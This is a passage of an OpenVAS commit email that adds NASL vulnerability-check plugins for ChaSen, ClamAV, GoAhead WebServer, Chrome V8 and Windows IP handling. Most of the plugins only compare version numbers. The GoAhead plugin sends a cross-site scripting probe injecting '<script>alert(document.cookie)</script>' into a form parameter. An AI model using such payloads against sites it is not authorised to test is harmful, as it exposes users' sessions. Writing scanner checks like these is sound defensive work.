[Openvas-commits] r12171 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Wed Nov 23 15:12:52 CET 2011
Author: antu123
Date: 2011-11-23 15:12:45 +0100 (Wed, 23 Nov 2011)
New Revision: 12171
Added:
trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl
trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl
trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl
trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl
trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl
trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl
trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl
trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl
trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl
Modified:
trunk/openvas-plugins/ChangeLog
trunk/openvas-plugins/scripts/gb_sendmail_mail_relay_vuln.nasl
Log:
Added new plugins and updated gb_sendmail_mail_relay_vuln.nasl
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/ChangeLog 2011-11-23 14:12:45 UTC (rev 12171)
@@ -1,3 +1,19 @@
+2011-11-23 Antu Sanadi <santu at secpod.com>
+
+ * scripts/gb_chasen_bof_vuln_win.nasl,
+ scripts/gb_chasen_bof_vuln_lin.nasl,
+ scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl,
+ scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl,
+ scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl,
+ scripts/secpod_clamav_recursion_dos_vuln_win.nasl,
+ scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl,
+ scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl,
+ scripts/secpod_goahead_webserver_mult_xss_vuln.nasl:
+ Added new plugins.
+
+ * scripts/gb_sendmail_mail_relay_vuln.nasl:
+ Added CVE-2003-0285 and updated description.
+
2011-11-23 Jan-Oliver Wagner <jan-oliver.wagner at greenbone.net>
* scripts/secpod_qemu_detect_lin.nasl: Revised according to CR#57.
Added: trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,103 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_chasen_bof_vuln_lin.nasl 18445 2011-11-11 11:11:11Z nov $
+#
+# ChaSen Buffer Overflow Vulnerability (Linux)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802344);
+ script_version("$Revision$");
+ script_cve_id("CVE-2011-4000");
+ script_tag(name:"cvss_base", value:"9.3");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-11 14:20:07 +0530 (Fri, 11 Nov 2011)");
+ script_name("ChaSen Buffer Overflow Vulnerability (Lindows)");
+ desc = "
+ Overview: The host is running ChaSen Software and is prone to buffer
+ overflow vulnerability
+
+ Vulnerability Insight:
+ The flaw is caused due to an error when reading user-supplied input string,
+ which allows attackers to execute arbitrary code via a crafted string.
+
+ Impact:
+ Successful exploitation allows remote attackers to cause a buffer overflow
+ or execute arbitrary code.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ ChaSen Version 2.4.x
+
+ Fix: Use ChaSen Version 2.3.3,
+ For Updates Refer, http://chasen.naist.jp/hiki/ChaSen/
+
+ References:
+ http://jvn.jp/en/jp/JVN16901583/index.html
+ http://jvndb.jvn.jp/en/contents/2011/JVNDB-2011-000099.html ";
+
+ script_description(desc);
+ script_summary("Check for the vulnerable ChaSen version");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Buffer overflow");
+ exit(0);
+}
+
+include("ssh_func.inc");
+include("version_func.inc");
+
+## Open the socket
+sock = ssh_login_or_reuse_connection();
+if(!sock){
+ exit(0);
+}
+
+## Confirm Linux, as SSH can be instslled on Windows as well
+result = ssh_cmd(socket:sock, cmd:"uname");
+if("Linux" >!< result){
+ exit(0);
+}
+
+chaName = find_file(file_name:"chasen-config", file_path:"/", useregex:TRUE,
+ regexpar:"$", sock:sock);
+
+foreach binaryName (chaName)
+{
+ ## Get the ChaSen version from command
+ chaVer = get_bin_version(full_prog_name:chomp(binaryName), version_argv:"--version",
+ ver_pattern:"[0-9.]+", sock:sock);
+
+ ## Check for ChaSen Version 2.4.x
+ if(chaVer[1] != NULL)
+ {
+ if(version_in_range(version:chaVer[1], test_version:"2.4.0", test_version2:"2.4.4"))
+ {
+ security_hole(0);
+ ssh_close_connection();
+ exit(0);
+ }
+ }
+}
Property changes on: trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date
Added: trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,96 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_chasen_bof_vuln_win.nasl 18445 2011-11-10 17:14:14Z nov $
+#
+# ChaSen Buffer Overflow Vulnerability (Windows)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802343);
+ script_version("$Revision$");
+ script_cve_id("CVE-2011-4000");
+ script_tag(name:"cvss_base", value:"9.3");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-09 16:19:55 +0530 (Wed, 09 Nov 2011)");
+ script_name("ChaSen Buffer Overflow Vulnerability (Windows)");
+ desc = "
+ Overview: The host is running ChaSen Software and is prone to buffer
+ overflow vulnerability
+
+ Vulnerability Insight:
+ The flaw is caused due to an error when reading user-supplied input string,
+ which allows attackers to execute arbitrary code via a crafted string.
+
+ Impact:
+ Successful exploitation allows remote attackers to cause a buffer overflow
+ or execute arbitrary code.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ ChaSen Version 2.4.x
+
+ Fix: Use ChaSen Version 2.3.3,
+ For Updates Refer, http://chasen.naist.jp/hiki/ChaSen/
+
+ References:
+ http://jvn.jp/en/jp/JVN16901583/index.html
+ http://jvndb.jvn.jp/en/contents/2011/JVNDB-2011-000099.html ";
+
+ script_description(desc);
+ script_summary("Check for the vulnerable ChaSen version");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Buffer overflow");
+ script_dependencies("secpod_reg_enum.nasl");
+ script_require_ports(139, 445);
+ exit(0);
+}
+
+include("smb_nt.inc");
+include("version_func.inc");
+include("secpod_smb_func.inc");
+
+## Check for Windows
+if(!get_kb_item("SMB/WindowsVersion")){
+ exit(0);
+}
+
+key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\chasen";
+if(!registry_key_exists(key:key)){
+ exit(0);
+}
+
+## Get ChaSen version from registry
+chaName = registry_get_sz(key:key, item:"DisplayName");
+if("ChaSen" >< chaName)
+{
+ chaVer = eregmatch(pattern:"ChaSen ([0-9.]+)", string:chaName);
+ if(chaVer[1] != NULL)
+ {
+ if(version_in_range(version:chaVer[1], test_version:"2.4.0", test_version2:"2.4.4")){
+ security_hole(0);
+ }
+ }
+}
Property changes on: trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date
Modified: trunk/openvas-plugins/scripts/gb_sendmail_mail_relay_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_sendmail_mail_relay_vuln.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/gb_sendmail_mail_relay_vuln.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -28,8 +28,8 @@
{
script_id(802194);
script_version("$Revision$");
- script_cve_id("CVE-2002-1278");
- script_bugtraq_id(6118);
+ script_cve_id("CVE-2002-1278", "CVE-2003-0285");
+ script_bugtraq_id(6118, 7580);
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"risk_factor", value:"High");
script_tag(name:"last_modification", value:"$Date$");
@@ -56,10 +56,14 @@
Affected Software/OS:
Linuxconf versions 1.24 r2, 1.2.5 r3
Linuxconf versions 1.24 r2, 1.2.5 r3 on Conectiva Linux 6.0 through 8
+ IBM AIX versions 4.3, 4.3.1, 4.3.2, 4.3.3, 5.1, 5.1 L, 5.2
Fix: Upgrade to the latest version of Linuxconf version 1.29r1 or later
For updates refer, http://www.solucorp.qc.ca/linuxconf/
+ For IBM AIX, apply the patch from below link
+ ftp://aix.software.ibm.com/aix/efixes/security/sendmail_3_mod.tar.Z
+
References:
http://osvdb.org/6066
http://xforce.iss.net/xforce/xfdb/10554
Added: trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_clamav_recursion_dos_vuln_win.nasl 18582 2011-11-22 17:51:52Z nov $
+#
+# ClamAV Recursion Level Handling Denial of Service Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902760);
+ script_version("$Revision$");
+ script_cve_id("CVE-2011-3627");
+ script_bugtraq_id(50183);
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-22 17:51:52 +0530 (Tue, 22 Nov 2011)");
+ script_name("ClamAV Recursion Level Handling Denial of Service Vulnerability (Windows)");
+ desc = "
+ Overview: The host is installed with ClamAV and is prone to denial of service
+ vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to the way the bytecode engine handled recursion
+ level when scanning an unpacked file.
+
+ Impact:
+ Successful exploitation will let the attackers to cause a denial of service
+ (crash) via vectors related to recursion level.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ ClamAV before 0.97.3 on Windows.
+
+ Fix: Upgrade to ClamAV version 0.97.3 or later
+ For updates refer, http://www.clamav.net/lang/en/download/
+
+ References:
+ http://www.ubuntu.com/usn/USN-1258-1/
+ https://bugzilla.redhat.com/show_bug.cgi?id=746984
+ http://git.clamav.net/gitweb?p=clamav-devel.git;a=commitdiff;h=3d664817f6ef833a17414a4ecea42004c35cc42f ";
+
+ script_description(desc);
+ script_summary("Check for the Version of ClamAV");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2011 SecPod");
+ script_family("Denial of Service");
+ script_dependencies("gb_clamav_detect_win.nasl");
+ script_require_keys("ClamAV/Win/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+avVer = get_kb_item("ClamAV/Win/Ver");
+if(avVer == NULL){
+ exit(0);
+}
+
+if(version_is_less(version:avVer, test_version:"0.97.3")){
+ security_warning(0);
+}
Property changes on: trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date
Added: trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,100 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_goahead_webserver_mult_xss_vuln.nasl 18585 2011-11-23 12:12:12Z nov $
+#
+# GoAhead WebServer 'name' and 'address' Cross-Site Scripting Vulnerabilities
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902589);
+ script_version("$Revision$");
+ script_bugtraq_id(50729);
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-23 12:12:12 +0530 (Wed, 23 Nov 2011)");
+ script_name("GoAhead WebServer 'name' and 'address' Cross-Site Scripting Vulnerabilities");
+ desc = "
+ Overview: This host is running GoAhead Webserver and is prone to multiple
+ cross site scripting vulnerabilities.
+
+ Vulnerability Insight:
+ Multiple flaws are caused due to improper validation of user-supplied input
+ via the 'name' and 'address' parameters in goform/formTest, which allows
+ attackers to execute arbitrary HTML and script code in a user's browser
+ session in the context of an affected site.
+
+ Impact:
+ Successful exploitation will allow remote attackers to insert arbitrary HTML
+ and script code, which will be executed in a user's browser session in the
+ context of an affected site.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ GoAhead Webserver version 2.5
+
+ Fix: No solution or patch is available as on 23rd November 2011. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://www.goahead.com/products/webserver/default.aspx
+
+ References:
+ http://osvdb.org/77198
+ http://secunia.com/advisories/46896
+ http://webserver.goahead.com/forum/topic/169 ";
+
+ script_description(desc);
+ script_summary("Check if GoAhead Webserver is vulnerable to Cross-Site Scripting");
+ script_category(ACT_ATTACK);
+ script_copyright("Copyright (C) 2011 SecPod");
+ script_family("Web Servers");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+
+## Check Port State
+if(!get_port_state(port)) {
+ exit(0);
+}
+
+## Check Banner And Confirm Application
+banner = get_http_banner(port:port);
+if("Server: GoAhead-Webs" >!< banner) {
+ exit(0);
+}
+
+## Construct Attack Request
+url = "/goform/formTest?name=<script>alert(document.cookie)</script>";
+
+## Try XSS attack and check the response to confirm vulnerability
+if(http_vuln_check(port:port, url:url, check_header: TRUE,
+ pattern:"Name: <script>alert\(document.cookie\)</script>")){
+ security_warning(port);
+}
Property changes on: trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date
Added: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl 18583 2011-11-21 17:43:12 nov $
+#
+# Google Chrome V8 Remote Code Execution Vulnerability (Linux)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902636);
+ script_version("$Revision$");
+ script_cve_id("CVE-2011-3900");
+ script_bugtraq_id(50701);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-11 11:11:11 +0530 (Mon, 14 Nov 2011)");
+ script_name("Google Chrome V8 Remote Code Execution Vulnerability (Linux)");
+ desc = "
+ Overview: The host is installed with Google Chrome and is prone to remote
+ code execution vulnerability.
+
+ Vulnerability Insight:
+ The flaw is due to an out-of-bounds write operation error in V8
+ (JavaScript engine) causing memory corruption.
+
+ Impact:
+ Successful exploitation could allow attackers to execute arbitrary code,
+ cause a denial of service.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ Google Chrome version prior to 15.0.874.121 on Linux
+
+ Fix: Upgrade to the Google Chrome 15.0.874.121 or later,
+ For updates refer, http://www.google.com/chrome
+
+ References:
+ http://osvdb.org/show/osvdb/77193
+ http://secunia.com/advisories/46889/
+ http://googlechromereleases.blogspot.com/2011/11/stable-channel-update_16.html ";
+
+ script_description(desc);
+ script_summary("Check the version of Google Chrome");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 SecPod");
+ script_family("General");
+ script_dependencies("gb_google_chrome_detect_lin.nasl");
+ script_require_keys("Google-Chrome/Linux/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+chromeVer = get_kb_item("Google-Chrome/Linux/Ver");
+if(!chromeVer){
+ exit(0);
+}
+
+## Check for Google Chrome Version less than 15.0.874.121
+if(version_is_less(version:chromeVer, test_version:"15.0.874.121")){
+ security_hole(0);
+}
Property changes on: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date
Added: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl 18583 2011-11-21 17:55:43 nov $
+#
+# Google Chrome V8 Remote Code Execution Vulnerability (Mac OS X)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902637);
+ script_version("$Revision$");
+ script_cve_id("CVE-2011-3900");
+ script_bugtraq_id(50701);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-21 17:55:43 +0530 (Mon, 21 Nov 2011)");
+ script_name("Google Chrome V8 Remote Code Execution Vulnerability (Mac OS X)");
+ desc = "
+ Overview: The host is installed with Google Chrome and is prone to remote
+ code execution vulnerability.
+
+ Vulnerability Insight:
+ The flaw is due to an out-of-bounds write operation error in V8
+ (JavaScript engine) causing memory corruption.
+
+ Impact:
+ Successful exploitation could allow attackers to execute arbitrary code,
+ cause a denial of service.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ Google Chrome version prior to 15.0.874.121 on Mac OS X
+
+ Fix: Upgrade to the Google Chrome 15.0.874.121 or later,
+ For updates refer, http://www.google.com/chrome
+
+ References:
+ http://osvdb.org/show/osvdb/77193
+ http://secunia.com/advisories/46889/
+ http://googlechromereleases.blogspot.com/2011/11/stable-channel-update_16.html ";
+
+ script_description(desc);
+ script_summary("Check the version of Google Chrome");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 SecPod");
+ script_family("General");
+ script_dependencies("gb_google_chrome_detect_macosx.nasl");
+ script_require_keys("GoogleChrome/MacOSX/Version");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+chromeVer = get_kb_item("GoogleChrome/MacOSX/Version");
+if(!chromeVer){
+ exit(0);
+}
+
+## Check for Google Chrome Version less than 15.0.874.121
+if(version_is_less(version:chromeVer, test_version:"15.0.874.121")){
+ security_hole(0);
+}
Property changes on: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date
Added: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl 18583 2011-11-21 17:12:14 nov $
+#
+# Google Chrome V8 Remote Code Execution Vulnerability (Windows)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902635);
+ script_version("$Revision$");
+ script_cve_id("CVE-2011-3900");
+ script_bugtraq_id(50701);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-21 17:153:15 +0530 (Mon, 21 Nov 2011)");
+ script_name("Google Chrome V8 Remote Code Execution Vulnerability (Windows)");
+ desc = "
+ Overview: The host is installed with Google Chrome and is prone to remote
+ code execution vulnerability.
+
+ Vulnerability Insight:
+ The flaw is due to an out-of-bounds write operation error in V8
+ (JavaScript engine) causing memory corruption.
+
+ Impact:
+ Successful exploitation could allow attackers to execute arbitrary code,
+ cause a denial of service.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ Google Chrome version prior to 15.0.874.121 on Windows
+
+ Fix: Upgrade to the Google Chrome 15.0.874.121 or later,
+ For updates refer, http://www.google.com/chrome
+
+ References:
+ http://osvdb.org/show/osvdb/77193
+ http://secunia.com/advisories/46889/
+ http://googlechromereleases.blogspot.com/2011/11/stable-channel-update_16.html ";
+
+ script_description(desc);
+ script_summary("Check the version of Google Chrome");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 SecPod");
+ script_family("General");
+ script_dependencies("gb_google_chrome_detect_win.nasl");
+ script_require_keys("GoogleChrome/Win/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+chromeVer = get_kb_item("GoogleChrome/Win/Ver");
+if(!chromeVer){
+ exit(0);
+}
+
+## Check for Google Chrome Versions prior to 15.0.874.121
+if(version_is_less(version:chromeVer, test_version:"15.0.874.121")){
+ security_hole(0);
+}
Property changes on: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date
Added: trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,136 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_ms_windows_ip_validation_code_exec_vuln.nasl 18523 2011-11-21 15:15:15Z nov $
+#
+# Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902588);
+ script_version("$Revision$");
+ script_cve_id("CVE-2005-0048");
+ script_bugtraq_id(13116);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-21 15:15:15 +0530 (Mon, 21 Nov 2011)");
+ script_name("Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability");
+ desc = "
+ Overview: The host is running Microsoft Windows and is prone to remote code
+ execution vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to insufficient validation of IP options and can be
+ exploited to cause a vulnerable system to stop responding and restart or may
+ allow execution of arbitrary code by sending a specially crafted IP packet
+ to a vulnerable system.
+
+ Impact:
+ Successful exploitation will let the attacker to cause a denial of service
+ and possibly execute arbitrary code via crafted IP packets with malformed
+ options.
+
+ Impact Level: System
+
+ Affected Software/OS:
+ Microsoft Windows XP SP2 and prior.
+ Microsoft Windows 2000 Server SP4 and prior.
+
+ Run Windows Update and update the listed hotfixes or download and
